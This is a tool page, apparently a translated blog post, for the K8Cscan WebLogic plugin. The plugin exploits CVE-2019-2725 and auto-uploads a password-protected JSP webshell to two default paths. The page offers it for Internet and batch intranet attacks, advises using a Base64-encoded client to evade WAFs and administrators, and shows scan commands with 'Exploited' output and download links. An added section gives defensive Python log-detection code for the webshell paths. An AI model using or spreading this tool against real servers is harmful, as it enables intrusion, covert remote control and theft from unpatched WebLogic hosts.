Main program: K8Cscan, a customizable scanner for large-scale intranet penetration testing
https://www.cnblogs.com/k8gege/p/10519321.html
WeblogicScan plugin
K8Cscan Moudle WeblogicScan & Exploit
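Currently only vulnerability ID CNVD-C-2019-48814 is supported.
This version detects the WebLogic vulnerability and automatically gets a shell (GetShell).
On the Internet it can be used as an EXP; on an intranet it can be used for automated penetration.
Batch scanning works in both cases (just supply an IP or a list of IP ranges).
(When I built the exp there was no CVE yet, so the output says CNVD; two days later it became CVE-2019-2725. Same vulnerability under a different name, so don't panic.)
Version 3.6 supports URLs and IP:port.
Usage:
K8cmdshell uploads a webshell to two default paths.
Connect with the Feidao (飛刀) cmd client; the traffic is Base64-encoded and can get past a WAF.
CMD commands sent unencoded are easily blocked by a WAF or noticed by an administrator.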
http://192.168.1.106:7001/_async/shell.jsp tom
http://192.168.1.106:7001/bea_wls_internal/shell.jsp tom

Specify a single IP (use as an EXP; enter an intranet or Internet IP)

    C:\Users\K8team\Desktop\Cscan>Cscan20.exe 192.168.1.106
    Cscan 3.5 By K8gege
    load netscan.dll
    192.168.1.106 WeblogicVUL CNVD-C-2019-48814 & Exploited
    Finished!

Specify a /24 (class C) range

    C:\Users\K8team\Desktop\Cscan>Cscan20.exe 192.168.1.106/24
    Cscan 3.5 By K8gege
    load netscan.dll
    Segment: 192.168.1.0
    =============================================
    192.168.1.106 WeblogicVUL CNVD-C-2019-48814 & Exploited
    192.168.1.1
    192.168.1.105
    192.168.1.108
    192.168.1.100
    =============================================
    onlinePC:5
    Finished!

Specify an IP list in ip.txt in the same directory (example scans 3 IPs)

    C:\Users\K8team\Desktop\Cscan>Cscan20.exe
    Cscan 3.5 By K8gege
    load netscan.dll
    scan ip.txt (IP)
    =============================================
    192.168.1.106 WeblogicVUL CNVD-C-2019-48814 & Exploited
    192.168.1.105
    192.168.1.1
    =============================================
    onlinePC:3
    Finished!

Specify a list of /24 ranges in ipc.txt in the same directory (example scans one range)

    C:\Users\K8team\Desktop\Cscan>Cscan20.exe
    Cscan 3.5 By K8gege
    load netscan.dll
    scan ipc.txt (IP/24)
    Segment: 192.168.1.0
    =============================================
    192.168.1.106 WeblogicVUL CNVD-C-2019-48814 & Exploited
    192.168.1.1
    192.168.1.105
    192.168.1.108
    =============================================
    onlinePC:4
    Finished!
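For defenders: because the tool drops its webshell under the two default paths listed above, requests for JSP files in those directories are a useful indicator in a WebLogic access log. The following is an added example, not part of the original post or of K8Cscan; it assumes the access log is in Common Log Format and that no legitimate JSP is served from these directories, and the sample log lines are constructed.

```python
import re
from collections import defaultdict
from urllib.parse import unquote, urlsplit

# The two default upload directories named on this page.
WATCHED_DIRS = ("/_async/", "/bea_wls_internal/")

# Assumption: Common Log Format access log.
CLF = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+'
)

def normalize(target):
    """Decode %xx, drop query and ;params, collapse '//' and lowercase the path."""
    path = unquote(urlsplit(target).path).split(";", 1)[0]
    return re.sub(r"/{2,}", "/", path).lower()

def jsp_hits(lines):
    """Return {path: [(client_ip, timestamp, status), ...]} for JSP requests
    under the watched directories."""
    hits = defaultdict(list)
    for line in lines:
        m = CLF.match(line)
        if not m:
            continue  # not an access-log line we understand
        path = normalize(m["target"])
        if path.startswith(WATCHED_DIRS) and path.endswith((".jsp", ".jspx")):
            hits[path].append((m["ip"], m["ts"], int(m["status"])))
    return dict(hits)

def served(hits):
    """Paths answered with 200 at least once: the file exists on the server."""
    return sorted(p for p, rows in hits.items()
                  if any(status == 200 for _, _, status in rows))

# Constructed sample lines (not taken from a real server).
SAMPLE = [
    '10.0.0.5 - - [01/May/2019:10:00:01 +0800] "GET /_async/ HTTP/1.1" 403 0',
    '10.0.0.5 - - [01/May/2019:10:00:03 +0800] "GET /_async/shell.jsp HTTP/1.1" 200 12',
    '10.0.0.5 - - [01/May/2019:10:00:04 +0800] "POST /bea_wls_internal//Shell.jsp?x=1 HTTP/1.1" 200 40',
    '10.0.0.9 - - [01/May/2019:10:02:00 +0800] "GET /%5Fasync/shell.jsp HTTP/1.1" 404 0',
    '10.0.0.7 - - [01/May/2019:10:03:00 +0800] "GET /app/index.jsp HTTP/1.1" 200 900',
]

if __name__ == "__main__":
    found = jsp_hits(SAMPLE)
    for path in served(found):
        print("JSP served from watched directory:", path, found[path])
```

A path returned by `served()` warrants checking the file on disk and the source addresses; a path that only ever returned 404 points to probing rather than a successful upload.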
3. Download
Automatic GetShell
https://github.com/k8gege/K8tools/blob/master/K8Cscan%20Moudle%20WeblogicScan%20%26%20Exploit.rar
Vulnerability scan only
https://github.com/k8gege/K8tools/blob/master/K8Cscan%20Moudle%20WeblogicScan%20Only%20Poc.rar
Main program